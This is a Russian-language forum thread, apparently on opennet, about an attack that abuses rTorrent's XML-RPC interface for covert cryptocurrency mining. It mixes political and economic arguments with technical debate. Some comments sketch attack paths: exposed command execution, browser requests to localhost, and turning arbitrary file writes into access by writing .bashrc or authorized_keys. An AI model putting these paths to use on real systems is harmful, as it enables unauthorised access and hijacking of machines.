Чтобы воспользоваться чужими наработками -- много ума НАДО. В этом принципиальная разница между изобретателем и инноватором. Изобретатель создаёт новое, инноватор агрегирует некоторое количество изобретений и внедряет их в нашу жизнь, создавая из них готовый массовый конечный продукт. Это весьма непростой процесс, и работы там очень много.

По поводу же хакера в изначальном понимании этого слова: неплохим безопасником -- будет стопудово. Иногда они ещё и хорошие хакеры.  Канонические хакеры.

Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

105. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от freehck email(ok) on 05-Мрт-18, 16:06 
>> и вообще, кто из нынешних профессионалов не занимался по молодости
>> мелким взломом? :)
>
> Вот только делали это в подавляющем большинстве случаев не для того,
> чтобы заработать. А здесь в первую очередь было именно желание
> заработать.

А вот мимо этого так же просто, как и мимо остального, пройти уже просто невозможно, немыслимо. Ведь в данной позиции прямым текстом написано, что получение материальной выгоды из предприятия -- есть отягчающее обстоятельство, которое якобы что-либо меняет. И в этом заключается вся сущность социалистического лагеря: в этой святой и неколебимой вере, что деньги суть зло.

Вы думаете, что деньги -- корень зла? А вы не задумывались над тем, что является корнем денег? Деньги -- инструмент обмена, который может существовать, только если есть производимые товары и люди, способные их производить. Деньги -- материальное выражение того принципа, что люди могут взаимодействовать при помощи торговли и платить ценностью за ценность. Деньги -- довод не попрошаек, которые со слезами клянчат ваш товар, или грабителей, которые забирают его силой. Деньги делают только те, кто производят. И это вы называете злом?

Когда вы получаете деньги в уплату за труды, вы делаете это в убеждении, что обменяете их на продукт чужого труда. Цену деньгам дают не попрошайки и грабители. Ни океан слез, ни все оружие в мире не превратят кусочки бумаги в вашем портмоне в хлеб, который вам нужен, чтобы дожить до завтра. Эти кусочки бумаги, как и золото, содержат энергию людей, производящих ценности. Ваш бумажник означает надежду на то, что где-то рядом с вами есть люди, не поступающиеся моральным принципом, который является корнем денег. И это вы называете злом?

Пытались ли вы отыскать корень производства? Посмотрите на электрогенератор и попробуйте убедить себя, что он создан лишь мышечными усилиями неразумных животных. Попытайтесь вырастить пшеничное зерно, не руководствуясь знаниями, оставленными нам людьми, впервые сумевшими этого добиться. Попытайтесь добыть пищу, не совершая ничего, кроме физического движения, и вы уразумеете, что человеческий разум -- корень всех ценностей и всего богатства, что существовали на Земле.

Но вы утверждаете, что деньги сделаны сильными за счет слабых? О какой силе вы говорите? Это не сила оружия или мускулов. Богатство -- продукт мыслительных способностей человека. Разве деньги, сделанные человеком, создавшим двигатель, сделаны за счет тех, кто его не создавал? Разве деньги интеллектуалов сделаны за счет дураков? Деньги способных -- за счет невежественных? Деньги амбициозных -- за счет ленивых? Деньги, прежде чем их могли бы украсть или выпросить, сделаны усилиями всех честных людей, каждым в меру его способностей. Честный человек -- тот, кто знает, что не может потребить больше, чем произвел.

Производство и торговля для получения денег -- вот пароль честных людей. Деньги опираются на аксиому, что каждый человек -- хозяин своего разума и своих усилий. Деньги постановили, что только сознательный выбор человека, решавшего продать вам свои усилия, оценивает их стоимость. Деньги разрешают вам получать товары и труд, только поэтому они имеют цену для людей. Деньги разрешают только честные сделки ради взаимной пользы, без принуждения, для приумножения, а не для оскудения. Для того чтобы осознать, что люди не тягловый скот, обреченный влачить свою ношу, ты предлагаешь им ценности, а не раны, доказывая, что связи между людьми -- не обмен страданиями, а обмен товарами.

Деньги требуют, чтобы ты продавал не свою слабость на потребу человеческой глупости, а свой талант -- нуждам людей. Они требуют, чтобы ты покупал не низкопробщину, которую тебе предлагают, а лучшее, что могут дать тебе деньги. А когда человек живет торговлей, руководствуясь умом, как высшим судьей, а не силой -- это лучший продукт: человек с высочайшими способностями. И уровень человеческой продуктивности -- уровень его вознаграждения. В этом состоит смысл существования, чьим инструментом и символом являются деньги. И это вы называете злом?

Деньги -- всего лишь инструмент. Они дадут вам все, чего вы пожелаете, но не заменят вас как человека, идущего к цели. Они дадут вам средства для удовлетворения ваших сегодняшних желаний, но не породят новых. Деньги наказывают тех людей, которые пытаются повернуть вспять закон причинности -- тех, кто хочет заменить разум продуктами разума.

Деньги не принесут счастья человеку, который не имеет понятия, чего он хочет. Если он отрицает знание о том, что нужно ценить, если он избегает выбора в том, что ценно, деньги не дадут ему законов определения ценности. Дурак не купит за деньги интеллект, трус -- отвагу, некомпетентный -- уважение. Тот, кто за деньги пытается купить мозги тех, кто находится ниже него, поставив во главу угла деньги, в итоге становится жертвой нижестоящих. Интеллектуалы избегают его, а мошенники и обманщики льнут к нему, привлеченные законом, который ему не дано понять: никому не позволено быть меньше, чем его деньги. По этой причине вы называете их злом?

Только человек, который в нем не нуждается, способен унаследовать богатство. Человеку, который сам способен заработать состояние, неважно, с чего он начнет. Если наследник достоин своих денег, они станут ему служить. Если же нет, они его разрушат. А вы кричите, что деньги развращают его. Так ли это? Или это он развращает деньги? Не завидуйте негодному наследнику, его богатство -- не ваше, и вы не стали бы лучше, получив его. Не думайте, что его должно распределить между вами; наплодить пятьдесят паразитов вместо одного значит рассеять состояние. Деньги -- жизненная сила, которая гибнет без своих корней. Деньги не служат разуму, который их не достоин. По этой причине вы называете их злом?

Деньги -- ваше выживание. Вердикт, вынесенный вами источнику средств вашего существования, вы выносите своей жизни. Если источник прогнил, вы проклинаете собственную жизнь. Вы получили ваши деньги обманным путем? Пользуясь человеческими пороками или человеческой глупостью?  Обслуживая дураков, в надежде получить больше, чем позволяют вам ваши возможности? Снижая ваши собственные стандарты? Выполняя работу, которую презираете? Если так, ваши деньги не принесут вам радости ни на грош. Тогда все те вещи, что вы покупаете, будут вам не на пользу, а в убыток; станут не достижением, а источником позора. Тогда вы закричите, что деньги -- зло. Зло, потому что разрушают уважение к вам?  Зло, потому что не дают вам наслаждаться своей порочностью? Не в этом ли корни вашей ненависти к деньгам?

Деньги всегда остаются результатом вашей деятельности и отказываются становиться на ваше место. Деньги -- продукт добродетели. Но они не рождают в вас добродетель и не уменьшают ваших пороков. Деньги не принесут вам того, чего вы не заслуживаете -- ни в материальном смысле, ни в духовном. Не в этом ли корни вашей ненависти к деньгам?

Или вы говорите, что корень зла -- любовь к деньгам? Любить вещь значит знать и любить ее суть. Любить деньги значит знать и любить тот факт, что деньги -- порождение лучшей силы в вас самих и ваше разрешение на продажу ваших усилий за усилия лучших среди людей. Это тот, кто продал душу за грош, громче всех провозглашает свою ненависть к деньгам, и у него есть на это веская причина. Те, кто любит деньги, хотят ради них работать. Они знают, что способны их заслужить.

Позвольте мне дать вам ключ к пониманию характера человека: человек, проклинающий деньги, получил их нечестным путем; тот, кто уважает деньги -- достоин их.

Бегите прочь от человека, который скажет вам, что деньги -- зло. Эта сентенция, как колокольчик прокаженного, предупреждает нас о приближении грабителя. Пока люди на Земле живут вместе, и у них есть причины взаимодействовать, их единственным доводом, если они отринут деньги, станет ружейный ствол.

Но, если вы хотите делать или хранить деньги, они потребуют от вас высших добродетелей. Люди, не имеющие отваги, гордости или самоуважения, люди, не имеющего морального права на деньги и не желающие защищать их, как они защищают свою жизнь, люди, которые просят прощение за то, что они богаты, недолго останутся богатыми. Они -- настоящая приманка для толп мародеров, толпящихся у подножия горы и пытающихся вскарабкаться на нее при первом возникновении страха у человека, который виновато просит прощения за то, что он обладает богатством. Они поспешат освободить его от сей вины, а заодно и от жизни, потому что он этого заслуживает.

И вот тогда вы увидите, как поднимутся люди двойных стандартов, те, кто живет по принципу силы, но рассчитывают на тех, кто живет, создавая деньги, которых они грабят, попутчики добродетели. В нравственном обществе они -- преступники, и законы написаны для того, чтобы защитить вас от них. Но когда общество создает «преступников-по-праву» и «грабителей-по-закону», которые используют силу, чтобы завладеть деньгами беззащитных жертв, тогда деньги становятся мстителем своих создателей. Такие грабители уверены в своей безопасности, когда грабят беззащитных людей, закон их не разоружит. Но их добыча становится магнитом для других грабителей, которые отбирают ее. Начинается гонка не среди лучших производителей, а среди самых отъявленных ворюг. Когда сила становится главным законом, убийца одерживает верх над карманным воришкой. И тогда общество исчезает во мраке руин и кровавой бойни.

Вы хотите узнать, близок ли этот день? Следите за деньгами. Деньги -- барометр общественной добродетели. Когда вы видите, что торговля ведется не по согласию, а по принуждению, когда для того, чтобы производить, вы должны получать разрешение от тех людей, кто ничего не производит, когда деньги уплывают к дельцам не за товары, а за преимущества, когда вы видите, что люди становятся богаче за взятку или по протекции, а не за работу, и ваши законы защищают не вас от них, а их -- от вас, когда коррупция приносит доход, а честность становится самопожертвованием, знайте, что ваше общество обречено. Деньги -- благородная материя. Что не противостоит оружию, то не выступает против жестокости. Они не позволят стране выжить в виде полусобственности, полудобычи.

Когда бы разрушители ни появились среди людей, они начинают с разрушения денег, потому что деньги -- защита людей и база их нравственного существования. Разрушители завладевают золотом, оставляя его хозяевам кипы обесцененных бумаг. Они убивают все объективные стандарты и отдают людей под деспотичную власть тех, кто произвольно устанавливает ценности. Золото было материальной ценностью, эквивалентом произведенного богатства. Бумага -- закладная расписка за несуществующие ценности, обеспеченная лишь угрозами расправы с теми, кто откажется созидать. Бумага -- это чек, выписанный легальными грабителями на счет, который им не принадлежит, на счет добродетели жертв. Ждите, и настанет день, когда чек вернется с пометкой «ваш счет превышен».

Сделав зло условием выживания, вы не можете ожидать, что люди останутся хорошими. Не ожидайте от них того, что они останутся нравственными и пожертвуют жизнями, чтобы стать пищей для безнравственных. Не ожидайте, что они будут создавать, когда производство наказывается, а грабеж вознаграждается. Не спрашивайте, кто разрушил сей мир. Это вы его разрушили.

Вас окружают величайшие достижения высочайшей производящей цивилизации, а вы удивляетесь, почему она рассыпается в прах вокруг вас, если вы проклинаете ее жизнь и кровь -- деньги. Вы смотрите поверх денег, как это делали до вас дикари, и недоумеваете, почему джунгли наступают на ваши города. На протяжении всей истории человечества деньги всегда крали грабители всех сортов, их имена изменялись, но метод оставался прежним: захватывать богатство силой и держать производителей связанными, униженными, бесславными, бесправными. Эта ваша фраза о том, что деньги -- зло, которую вы так церемонно и многозначительно произносите, пришла к нам из времен, когда богатство создавалось руками рабов, повторявших движения, некогда изобретенные чьим-то умом и столетиями остававшиеся неизменными. Когда производство управляется силой, а богатство добывается завоеваниями, возможности для конкуренции минимальные. И все же сквозь все столетия стагнации и голода люди возносили грабителей, как аристократов меча, аристократов по рождению, аристократов письменного стола, и презирали производителей, рабов, торгашей и лавочников, фабрикантов.

Если вы не откроете для себя той истины, что деньги -- корень всего доброго, что есть в мире, вы придете к собственному разрушению. Когда деньги станут инструментом отношений между людьми, человек станет инструментом человека. Выбирайте: кровь, кнут и оружие или доллары, другого не дано...

Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

109. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 07-Мрт-18, 08:27 
Офигенный опус мыслящего человкеа.

> Если вы не откроете для себя той истины, что деньги -- корень
> всего доброго, что есть в мире, вы придете к собственному разрушению.

Возможно, им больше нравится протирать штаны в печальной конторе, "по распределению", по сути в режиме "продвинутый крепостной + гарантированный доход". Проблема только в том что этот режим в масштабах страны потом валит к черту всю экономику, а крепостные оказываются совершенно неконкурентоспособны. И начинаются сказки что в ж...е виноват загнивающий запад. Потому если эту сказку не рассказывать, драный пролетариат может и спросить ведь за свои беды. А спрашивает пролетариат довольно сурово, фонари будут заняты. Об этом ушлые кукловоды из кремля кажется опять вспомнили и объем вранья опять начал зашкаливать. Но это дорога вникуда.

Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

110. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Ю.Т. on 07-Мрт-18, 08:34 
> сказки что в ж...е виноват загнивающий запад. Потому если эту сказку
> не рассказывать, драный пролетариат может и спросить ведь за свои беды.

Ладно, ладно. Ни чудес, ни сверхчеловеков не бывает.
А поскольку энтропию убить нельзя, а можно лишь перераспределить, то и "райские уголки" земшара существуют лишь потому, что в нерайских устойчиво воспроизводится "немножко не та" модель общественного устройства.
И, кстати, да, в ж*е виноваты и сами, поскольку разрешили спихнуть всё это к нам.

Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

111. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 07-Мрт-18, 09:10 
> Ладно, ладно. Ни чудес, ни сверхчеловеков не бывает.

Зато бывают лохи-по-жизни (догадайтесь на кого я намекаю) и те кто ими беспринципно пользуется под громкие лозунги и красивые сказки (догадайтесь на кого я намекаю).

> уголки" земшара существуют лишь потому, что в нерайских устойчиво воспроизводится "немножко
> не та" модель общественного устройства.

Это такой намек, что россияне должны быть именно в таком виде, в назидание остальным? Это звучит досадно но очень правдоподобн.

> И, кстати, да, в ж*е виноваты и сами, поскольку разрешили спихнуть всё это к нам.

Что к вам спихнули? Синтетический коммунизм который истошно вилял задом, сперва вещая что деньги не нужны, а потом оказалось что все же нужны, но признавать ошибки - стремно, поэтому давайте мы тихой сапой, какой-то эрзац. И получился госмонополизм, с планами и распределениями. И толпа крепостных, клавших на какие там улучшения продукции. Вон тут уже Шигорин такой образовался, вещает что за хорошими впечатлениями от продукта - не к ним. Как еще понятнее человек может гордиться своим производством автоТАЗиков? А когда такое начинается в масштабах страны - ну, все постепенно сколлапсирует. Поскольку ЭТО перестают хотеть даже дрессированные патриот-хомяки, которые почему-то начинают устраивать фарцу и блат и какие-то квазимафиозные схемы в обход унылого официоза. В котором оказывается что гремящий жигуль положен только МакЛаудам и тем у кого в *-коме друганы есть.

Ответить | Правка | ^ к родителю #110 | Наверх | Cообщить модератору

117. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Ю.Т. on 07-Мрт-18, 16:29 
>> Ладно, ладно. Ни чудес, ни сверхчеловеков не бывает.
> Зато бывают лохи-по-жизни (догадайтесь на кого я намекаю) и те кто ими

Недочеловеков тоже не бывает.

>> уголки" земшара существуют лишь потому, что в нерайских устойчиво воспроизводится "немножко
>> не та" модель общественного устройства.
> Это такой намек, что россияне должны быть именно в таком виде, в
> назидание остальным? Это звучит досадно но очень правдоподобн.

Да какое-такое "назидание"? Должны быть в таком виде (и не только россияне), чтобы там было не в таком виде. Чудес не бывает, повторяю. А все далее поскипанные типа объяснения  это просто стэнд-ап комеди, рассыпаемая, чтобы недалёкие повторяли.

Ответить | Правка | ^ к родителю #111 | Наверх | Cообщить модератору

120. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 09-Мрт-18, 15:25 
> Недочеловеков тоже не бывает.

Мне бы хотелось так думать, и к этому надо стремиться наверное. Но когда кем-то буквально подтираются, как туалетной бумагой, а он потом еше и пытается доказать с пеной у рта что так и задумано, и терпеть не может тех кто собой подтереться не дает - наблюдаемая картина мира идеалу не соответствует.

Очень хорошо было видно на примере раскулачивания. И все же усы у кривой лживой модельки отклеивались. Даже через много лет. Достаточно посмотреть на состояние "народного" имущества было, чтобы заметить насколько "народу" такой совсем-не-лохотрон был реально нужен.

Громкие слоганы - это чудесно. А разъе...е коровники, убитая техника, облезлые корпуса, повсеместный уход от ответственности и прочие атрибуты - таки были. Слов из песни не выкинешь, делом доказали что моделька работает ХРЕНОВО.

> Да какое-такое "назидание"? Должны быть в таком виде (и не только россияне),
> чтобы там было не в таком виде.

В виде мягкой туалетной бумаги для узкой группы особо привилегированных лиц, с отдельными магазинами и привилегиями, в отличие от плебса, роющего помойки?

> Чудес не бывает, повторяю. А все далее поскипанные типа объяснения  это просто
> стэнд-ап комеди, рассыпаемая, чтобы недалёкие повторяли.

Чудес не бывает, зато бывают рассуждизмы о светлом будушем пока верхушка втирает очки а плебс копошит помойки.

Ответить | Правка | ^ к родителю #117 | Наверх | Cообщить модератору

97. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 11:43 
> Вот вы точно знаете, что у студента, например, денег точно никогда не водится. Поэтому он едет зайцем от общаги до универа с утра.

Лично я знаю, что студенческий проездной стоит копейки, и каждый день рисковать быть как минимум ссаженным никто в здравом уме не будет.

Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

115. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 07-Мрт-18, 09:48 
> Лично я знаю, что студенческий проездной стоит копейки,

Он стоит копейки по меркам нормального человека. Который может профитом заняться вплотную, выделив на это хотя-бы полдня несколько раз в неделю. А для студня из общаги, который так не может, потому что учится и делает домашку, так что свободна у него разве что ночь, это ак бы проблема. Он и так то на стипуху с голоду сдохнуть норовит, а если еще и проездной оплатить...

Нет, конечно, некоторые студни идут по ночам вагоны разгружать. Но как ты понимаешь, при этом придется чем-то поступиться. Например, успеваемостью. Может, шли бы и куда-то еще, но куда ж ты с российским образованием пойдешь, особенно на младших курсах? Ну может витуху тянуть, но это и джамшут не отягощенный обучением может делать, дешево и сердито. Поконкурируй-ка с ним, пытаясь учиться.

Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

99. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Ю.Т. on 04-Мрт-18, 11:57 
> Мораль тут такая: воровство -- это не всегда плохо, а асоциальные личности
> -- не всегда вредители.

Поздравляю, вы только что переоткрыли относительный (классовый) характер морали, о котором давно говорили... кхм, кхм... "коммуняжки". :)

Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

112. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 07-Мрт-18, 09:15 
> Поздравляю, вы только что переоткрыли относительный (классовый) характер морали, о котором
> давно говорили... кхм, кхм... "коммуняжки". :)

Ваша же высокая мораль обычно сводится к тому, чтобы сидя в гадюшне с голым задом порадоваться тому что у соседа корова сдохла. И еще неплохо бы калитку этому гаду сломать, а то чойта мерзавец новую поставил, да еще с свежей краской.

Ах да, потом еще надлежит улыбнуться в лицо соседу, посочувствовать насчет калитки и задвинуть громкий тезис что ее раздолбали враги коммунизма и агенты госдепа. Как по мне - так на этом фоне мораль капиталистов не такая уж и плохая, ибо все познается в сравнении.

Ответить | Правка | ^ к родителю #99 | Наверх | Cообщить модератору

118. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Ю.Т. on 07-Мрт-18, 16:32 
>> Поздравляю, вы только что переоткрыли относительный (классовый) характер морали, о котором
>> давно говорили... кхм, кхм... "коммуняжки". :)
> Ваша же высокая мораль

Причём здесь наша высокая мораль? Поскипанное -- ваша проекция.

Ответить | Правка | ^ к родителю #112 | Наверх | Cообщить модератору

121. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 09-Мрт-18, 15:31 
> Причём здесь наша высокая мораль? Поскипанное -- ваша проекция.

При чем? Практика показала что обычно это сводится к чему-то такому. Высокие идеалы на парадной вывеске, аквариум с крокодилами соревнующимися кто кого раньше сожрет - по факту.

Ответить | Правка | ^ к родителю #118 | Наверх | Cообщить модератору

124. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Ю.Т. on 09-Мрт-18, 16:28 
>> Причём здесь наша высокая мораль? Поскипанное -- ваша проекция.
> При чем? Практика показала что обычно это сводится к чему-то такому. Высокие

"Практика"? Но вы это всё только по худ. литературе и знаете.
А наукой доказано -- даже личная память о прошлом практически всегда определяется -- огрубляю -- общественным мнением.

Ответить | Правка | ^ к родителю #121 | Наверх | Cообщить модератору

72. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Fedd on 03-Мрт-18, 13:13 
Спорю ребята из project-zero идейку подсказали https://bugs.chromium.org/p/project-zero/issues/detail?id=1524
Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

76. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от Аноним (??) on 03-Мрт-18, 13:34 
> Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими
> мозгами и предприимчивостью.

А еще менее смекалистые за столько могут и год-два пахать. Да еще таская какие-нибудь ящики или что там еще. Быть тупым вообще очень так себе...

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

5. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от anonymous (??) on 02-Мрт-18, 12:26 
охренеть. какой ... такое проектировал?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

7. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +5 +/
Сообщение от IB on 02-Мрт-18, 12:33 
В смысле кто проектировал такой DNS?

Знают, борются, но legacy.

С какого перепугу локально работающее приложение на localhost должно защищаться от внешних! атак.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

29. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 15:08 
С такого перепугу, что эти атаки не вчера придумали.
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

54. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 22:38 
> С какого перепугу локально работающее приложение на localhost должно защищаться от внешних! атак.

с какого перепугу докальное приложение испаользует сетевые порты а не Unix Domain Socket?

СЕТЕВЫЕ! от слова СЕТЬ

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

58. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 23:38 
По умолчанию оно ни то, ни другое не использует, порты и unix-сокеты открываются специальной директивой в конфиге.

Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

89. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:25 
> С какого перепугу локально работающее приложение на localhost должно защищаться от внешних! атак.

С такого что внезапно вебпага в браузере может взять да и попросить localhost. И вот он не такой уж и локальный оказывается. Сюрприз.

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

6. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –2 +/
Сообщение от Яйцассыром on 02-Мрт-18, 12:33 
>> а также убивает все процессы sshd.

Подскажите, с каких это пор, в этих наших линуксах, кто-попало может кильнуть процесс запущенный от другого пользователя?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +3 +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:40 
Ну ты попробуй прибей обычным юзером sshd от рута запущенный, потом расскажи об успехах.
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

10. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от imho on 02-Мрт-18, 12:46 
А кто сказал что он чужие убивает?
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

17. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от нах on 02-Мрт-18, 13:13 
ну как бы редко sshd запускают от юзера, лазящего по порносайтам...

хотя...

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

11. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:56 
Если кто-то уже вломился в систему, то скорее всего под тем же юзером. А если нет — ну что ж, не судьба, придётся конкурировать за процессор.
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

13. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:57 
т.е. если rtorrent висит на отдельном компе, бояться нечего?
еще и запущен под юзером, которому не разрешено добавлять ничего в cron

но вообще, подход конечно не радует... rtorrent интересно собирается это исправлять?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

21. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –3 +/
Сообщение от Аноним (??) on 02-Мрт-18, 13:52 
Что там исправлять? По умолчанию xmlrpc-интерфейс выключен. Если кто-то его включает на сетевом интерфейсе (а не на UNIX-сокете с ограничением прав доступа) и тем более открывает доступ к нему из сети — ССЗБ.

А то, что xmlrpc-интерфейс позволяет выполнять команды, не намного опаснее возможности записи произвольных файлов, для предоставления которой он предназначен.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

27. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от нах on 02-Мрт-18, 14:42 
> Что там исправлять?

авторизацию. (и transmission туда же)
Кстати, зачем вообще какому-то торренту уметь - exec ?

> А то, что xmlrpc-интерфейс позволяет выполнять команды, не намного опаснее возможности записи
> произвольных файлов

записываем файл с эксплойтом, исполняем - и вот мы рут.
Сама возможность записать файл - рута тебе просто так не принесет, придется сильно повозиться.

Хотя, конечно, немодно. майнинг наше все.
(уныло глядит на многоголовый xeon... 300 хешей максимум. Ну и чего их вот ломать?)

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

35. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 15:59 
> (уныло глядит на многоголовый xeon... 300 хешей максимум. Ну и чего их вот ломать?)

Курочка по зёрнышку клюёт. Вот эта на 4200$ наклевала, может и ещё успеет, пока все спохватятся.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

56. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от Аноним (??) on 02-Мрт-18, 23:32 
> авторизацию

Там она не предусмотрена, для авторизации предписывается использовать функционал http-сервера. UNIX-way, каждая программа выполняет свою небольшую задачу, слышали о таком?

> зачем вообще какому-то торренту уметь - exec ?

Привязывать произвольные действия к событиям скачивания торрентов.

> записываем файл с эксплойтом

Удачи найти эксплойт под автоматически обновляемый дистрибутив.

> Сама возможность записать файл - рута тебе просто так не принесет

Выполнение команд — тоже.
Возможность записи произвольных файлов от возможности выполнять команды в данном контексте отличается только длительностью ожидания выполнения: записанный .bashrc выполнится при первом же запуске интерактивного шелла.

rTorrent проектировался для максимального удобства грамотного пользователя, без оглядки на то, какие органы с его помощью прищемит обезьяна. И мне нравится именно такой софт — который не переставляет мне ноги в задуманном автором порядке, а за счёт простоты и спроектированности для работы совместно с другим софтом предоставляет возможность максимально кастомизировать своё поведение.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

57. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 23:34 
> записанный .bashrc

Или .ssh/authorized_keys.

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

95. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:44 
> UNIX-way, каждая программа выполняет свою небольшую задачу, слышали о таком?

Офигенное оправдание api без авторизации. Знаете, если RPC api в результате может дергать кто попало - это хреновая реализация задачи.

Да и stdin/out/... у rtorrent парсить - как-то вообще совсем нифига не юниксвэйно, если что. Хотя половина юниксвэя была об этом.

> rTorrent проектировался для максимального удобства грамотного пользователя,

Он вообще проектировался? Выглядит довольно хаотично и имеет хренову кучу проблем юзабилити. В его чудном текстовом интерфейсе сложно понять чем он вообще занимается.

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

100. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 16:11 
> Офигенное оправдание api без авторизации.

Может быть, ещё в bash сделать авторизацию при запуске интерактивной сессии? Или в netcat при принятии соединения? Или в winapi показывать окошко подтверждения при каждом вызове CreateProcess?
Это API не для вываливания наружу, и даже не для открытия на локалхосте, если имеет значение разграничение пользователей. Если кто попало получает возможность его дёргать, то это проблема настройки системы, а не плохое API.

> половина юниксвэя

Но не весь. Демоны — это юниксвейно? А они обычно не используют stdin/stdout для работы.

Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

113. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 07-Мрт-18, 09:33 
> Может быть, ещё в bash сделать авторизацию при запуске интерактивной сессии?

Если внешняя страница в браузере сможет вызывать bash угодным ей образом - то таки да. Иначе у вас майнеров будет хоть отбавляй.

> Или в netcat при принятии соединения?

Если браузер сможет запускать неткат по своему усмотрению - таки да. Иначе вы станете халявным прокси для ддосов и спама.

> Или в winapi показывать окошко подтверждения при каждом вызове CreateProcess?

Ах, вы пользователь винды. Так бы сразу и сказали, можно было бы и не париться вашим мнением про безопасность тогда. Линуксоиды, если что, таки придумали запрет явно лишних сисколов - и поэтому если мы знаем что сервер не выполняет внешние процессы, у нас таки fork() и execve() таки получит от ворот поворот. Без всяких ламерских окошек.

> Это API не для вываливания наружу, и даже не для открытия на локалхосте,

А все-равно косвенными настройками можно их спровоцировать, потому что настройка того что клиент делает может требоваться. Включая и запуск скриптов/программ по окончании закачки торента.

А когда фича вроде бы нужна, но вроде бы может быть абузивно использована - значит должна быть авторизация использования фичи. Так же как рута в нормально настроенном *никс не дают всем подряд просто так. А для RPCшного вебапи уровень паранои выше, там и просто пользователя давать без авторизации нельзя, иначе завалит майнерами и прокси.

> если имеет значение разграничение пользователей.

Сокеты типа локалхоста - от пользователей не зависят. И это как бы некая проблема, поскольку браузер пользователя без вопросов сходит на 127.0.0.1 и попросит там чего-то странного, даже если процесс от совсем другого пользователя. А пользователь вообще мог даже не заметить что его браузер одурачили.

Ну вот есть такая данность в этом мире - ремоты могут дурачить браузеры, провоцируя их на локальные запросы. И если кто думал что его сервис на 127.0.0.1 будет недоступен снаружи - он ошибался.

Есть более развитые варианты этой атаки - ремоты могут провоцировать DPI и прозрачные прокси на доступ к интранету, которого изначально снаружи не было. И если ты думаешь что такой умный и все подобные плюхи сможешь заткнуть - ну попробуй, безопасТничек.
